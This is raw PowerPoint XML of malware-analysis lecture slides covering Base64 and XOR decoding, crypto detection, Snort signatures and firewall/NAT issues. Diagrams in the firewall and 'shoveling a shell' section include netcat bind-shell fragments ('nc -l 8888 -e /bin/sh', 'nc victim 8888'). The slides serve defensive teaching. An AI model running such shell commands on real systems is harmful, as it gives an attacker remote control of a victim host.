              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>13-3, p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>. 274, Loc. 6863</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Decoding loops easy to identify via searching for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> opcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Figure 13-2, p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. 275, Loc. 6894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599651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ciphers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Base-64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>From MIME standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Represents binary data in an ASCII string format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Binary data converted into one of 64 primary characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>a-zA-Z0-9+/] with = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>used for padding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Every 3-bytes of binary data is encoded in 4-bytes of Base64 (Figure 13-4, p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. 277, Loc. 6968)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>3 byte binary =01001101 01100001 01101110</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>4 byte Base64 = 010011 010110 000101 101110</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>TWFu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3048000" y="4648200"/>
            <a:ext cx="5163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0  1  2  3  4  5  6  7  8  9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A  B  C  D  E  F  G  H  I  J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10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K  L  M  N  O  P  Q  R  S  T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20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U  V  W  X  Y  Z  a  b  c  d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30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e  f  g  h  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i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  j  k  l  m  n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40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o  p  q  r  s  t  u  v  w  x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50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y  z  0  1  2  3  4  5  6  7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/>
            </a:r>
            <a:b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</a:b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 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60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>8  9  +  /</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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4191000" y="4495800"/>
            <a:ext cx="3200400" cy="76200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9976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ciphers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Base-64 decoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Look for a string used as an index table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Try on-line conversion tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Caution: Malware can easily modify index table to create custom substitution ciphers very easily (see book example)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0528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Cryptographic ciphers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Drawbacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Crypto libraries are large and easily detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Must hide the key for symmetric encryption algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Recognizing encrypted code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Imports include well-known </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenSSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> or Microsoft functions (Figure 13-9, p. 282, Loc. 7058)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Use of cryptographic constants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>DES constants found by FindCrypt2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> in IDA Pro (Figure 13-10, p. 282, Loc. 7079)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Or both</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Krypto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ANALyzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>PEiD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> (Figure 13-11, p. 283, Loc. 7085)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="389314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56320" y="1847715"/>
            <a:ext cx="2609280" cy="498292"/>
            <a:chOff x="1428" y="1283"/>
            <a:chExt cx="1812" cy="346"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13314" name="AutoShape 2"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1428" y="1547"/>
              <a:ext cx="1581" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="6336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1640" y="1283"/>
              <a:ext cx="160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533400" indent="-514350"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1pPr>
              <a:lvl2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2pPr>
              <a:lvl3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3pPr>
              <a:lvl4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4pPr>
              <a:lvl5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Connection</a:t>
              </a:r>
            </a:p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Attempt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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05280" y="1600008"/>
            <a:ext cx="1465920" cy="1566885"/>
            <a:chOff x="212" y="1111"/>
            <a:chExt cx="1018" cy="1088"/>
          </a:xfrm>
        </p:grpSpPr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" y="1111"/>
              <a:ext cx="1018" cy="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85" y="1928"/>
              <a:ext cx="91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533400" indent="-514350"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1pPr>
              <a:lvl2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2pPr>
              <a:lvl3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3pPr>
              <a:lvl4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4pPr>
              <a:lvl5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Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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266720" y="1523681"/>
            <a:ext cx="1981440" cy="1847714"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="800000">
              <a:alpha val="50000"/>
            </a:srgbClr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500" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewall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500" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or </a:t>
            </a:r>
          </a:p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500" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAT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118400" y="1843394"/>
            <a:ext cx="460462" cy="76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1473" tIns="42452" rIns="41473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4400" b="1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5492160" y="3505328"/>
            <a:ext cx="2978779" cy="34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1473" tIns="42452" rIns="41473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–l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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8888 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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–e /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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56320" y="3505328"/>
            <a:ext cx="2018880" cy="34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1473" tIns="42452" rIns="41473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 victim 8888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086241" y="1676336"/>
            <a:ext cx="1465920" cy="1566885"/>
            <a:chOff x="4921" y="1164"/>
            <a:chExt cx="1018" cy="1088"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13324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1164"/>
              <a:ext cx="1018" cy="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4995" y="1981"/>
              <a:ext cx="91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533400" indent="-514350"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1pPr>
              <a:lvl2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2pPr>
              <a:lvl3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3pPr>
              <a:lvl4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4pPr>
              <a:lvl5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Victim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280099"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Issues with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="280099"/>
                </a:solidFill>
              </a:rPr>
              <a:t>firewalls and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="280099"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAT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7518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Cryptographic ciphers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Recognizing encrypted data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Some malware employs crypto algorithms that do not have constants (RC4, IDEA generate at run-time) or do not rely on libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Must search for high-entropy content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IDA Pro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Entropy Plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(Figure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>13-12, 13-13, p. 284</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, 285, Loc. 7110, 7125)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314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Custom encoding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Look for hints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trace execution to see suspicious activity in a tight loop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: pseudo-random number generation followed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Figure 13-14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, p. 287, Loc. 7174)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1361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Decoding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Self-decoding malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Malware packaged with decoding routine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Tell-tale sign: strings that don't appear in binary file on disk, but appear in debugger </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Decrypt by setting a breakpoint directly after decryption routine finishes execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Malware employing decoding functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Can sometimes use standard libraries to decode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Python's  base64.decodestring() or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>PyCrypto's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> functions (Listing 13-7, 13-8, 13-9, 13-10 p. 289)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Or programmatically use debugger to re-run malware’s decoding code with chosen parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ImmDbg Python example in textbook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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015020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Lab 13-1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="3772060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56481" y="596223"/>
            <a:ext cx="8226720" cy="114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857459"/>
            <a:ext cx="8410575" cy="623887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chapter 14: Malware-Focused Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Signatures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7175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Networking and </a:t>
            </a:r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/>
              <a:t>Network Countermeasures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/>
              <a:t>Safely Investigating an Attacker Online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/>
              <a:t>Content-Based Network Countermeasures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/>
              <a:t>Combining Dynamic and Static Analysis Techniques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sz="2800" dirty="0"/>
              <a:t>Understanding the Attacker's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Perspective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71219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Network Countermeasures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IP connectivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Restrict network access using routers and firewalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr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Reroute known malicious domains to an internal host (sinkhole)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Content-filters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Proxies, intrusion detection systems, intrusion prevention systems for intercepting web requests in order to detect or prevent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499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Network Countermeasures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Mine logs, alerts, and packet captures for forensic information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No risk of infection when performing post-mortem analysis versus actively attempting to run malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware can be programmed to detect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>active analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Indications of malicious activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Beacons to malicious sites, especially if done without DNS query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1665322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23913"/>
            <a:ext cx="8410575" cy="623887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2.  Safely Investigating an Attacker Online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563687"/>
            <a:ext cx="8382000" cy="498951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Indirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Use network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>anonymizers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> such as Tor to hide yourself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Use a virtual machine and virtual networks running through remote infrastructure (cellular, Amazon EC2, etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Open-source Intelligence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Collect IP address and DNS information on suspicious activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>See Regional Internet Registries to find out organizational assignment of IP blocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> records of DNS names to find contact information metadata (domaintools.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Recon slides in CS 410/510: Web Security class, recon-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> in Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Caution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Attacker can bind payload to victim and disappear if something is amiss when you connect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830275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1513"/>
            <a:ext cx="8410575" cy="623887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>3.  Content-Based Network Counter-Measures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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8951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Intrusion Detection with Snort</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Rules that link together elements that must be true to fire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Size of payload, flag fields, specific settings of TCP/IP headers, HTTP headers, content in payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Table 14-1, p. 299, Loc. 7470: Wefa7e's HTTP User-Agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Potential Snort rule to detect Wefa7e p. 303, Loc. 7568</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>But, variants of malware will tweak User-Agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>But…what if? p. 306, Loc. 7660</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Could use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>regexps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> to modify rule, but not a tenable approach in general</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Malware intentionally generating false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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660088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Shoveling a shell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19050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Bypass firewalls and NAT by reversing connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Have attacker run listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Victim initiates outgoing connection (e.g. IRC, HTTP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/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H="1">
            <a:off x="1621440" y="4222524"/>
            <a:ext cx="4806720" cy="2880"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6336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361600" y="4350698"/>
            <a:ext cx="2322720" cy="515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533400" indent="-514350"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33400" algn="l"/>
                <a:tab pos="990600" algn="l"/>
                <a:tab pos="1447800" algn="l"/>
                <a:tab pos="1905000" algn="l"/>
                <a:tab pos="2362200" algn="l"/>
                <a:tab pos="2819400" algn="l"/>
                <a:tab pos="3276600" algn="l"/>
                <a:tab pos="3733800" algn="l"/>
                <a:tab pos="4191000" algn="l"/>
                <a:tab pos="4648200" algn="l"/>
                <a:tab pos="5105400" algn="l"/>
                <a:tab pos="5562600" algn="l"/>
                <a:tab pos="6019800" algn="l"/>
                <a:tab pos="6477000" algn="l"/>
                <a:tab pos="6934200" algn="l"/>
                <a:tab pos="7391400" algn="l"/>
                <a:tab pos="7848600" algn="l"/>
                <a:tab pos="8305800" algn="l"/>
                <a:tab pos="8763000" algn="l"/>
                <a:tab pos="9220200" algn="l"/>
                <a:tab pos="96774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9000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="907"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="15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Connection shovel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05280" y="4026662"/>
            <a:ext cx="1465920" cy="1566885"/>
            <a:chOff x="212" y="2796"/>
            <a:chExt cx="1018" cy="1088"/>
          </a:xfrm>
        </p:grpSpPr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" y="2796"/>
              <a:ext cx="1018" cy="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85" y="3613"/>
              <a:ext cx="91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533400" indent="-514350"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1pPr>
              <a:lvl2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2pPr>
              <a:lvl3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3pPr>
              <a:lvl4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4pPr>
              <a:lvl5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Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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266720" y="4026663"/>
            <a:ext cx="1981440" cy="1847714"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="800000">
              <a:alpha val="50000"/>
            </a:srgbClr>
